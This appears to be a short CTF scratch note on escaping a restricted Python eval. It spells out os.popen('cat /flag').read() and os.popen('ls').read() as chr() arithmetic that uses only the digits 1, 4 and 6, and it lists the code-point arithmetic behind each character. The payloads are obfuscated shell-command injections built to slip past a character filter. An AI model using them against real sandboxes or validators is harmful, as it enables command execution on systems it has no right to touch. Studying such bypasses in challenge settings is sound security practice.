os.popen('cat /flag').read()



"o"+ch(116-1)+"."+ch(16*6+16)+"o"+ch(16*6+16)+"e"+ch(16*6+14)+"('c"+ch(16*6+1)+ch(116)+ch(16+16)+"/"+ch(16*6+6)+"l"+ch(16*6+1)+ch(16*6+6+1)+"').re"+ch(16*6+1)+"d()"

Allowed: 1, 4, 6
115 = 116-1
112 = 16*6+16
110 = 16*6+14
97  = 16*6+1
32  = 16+16
102 = 16*6+6
103 = 16*6+6+1

-----
os.popen('ls').read()

o+ch(115)+.+ch(112)+o+ch(112)+e+ch(110)+(+'+l+ch(115)+'+)+.+r+e+ch(97)+d+(+)

"o"+chr(116-1)+chr(46)+chr(16*6+16)+"o"+chr(16*6+16)+"e"+chr(16*6+14)+"('l"+chr(116-1)+"')"+chr(46)+"re"+chr(16*6+1)+"d()"
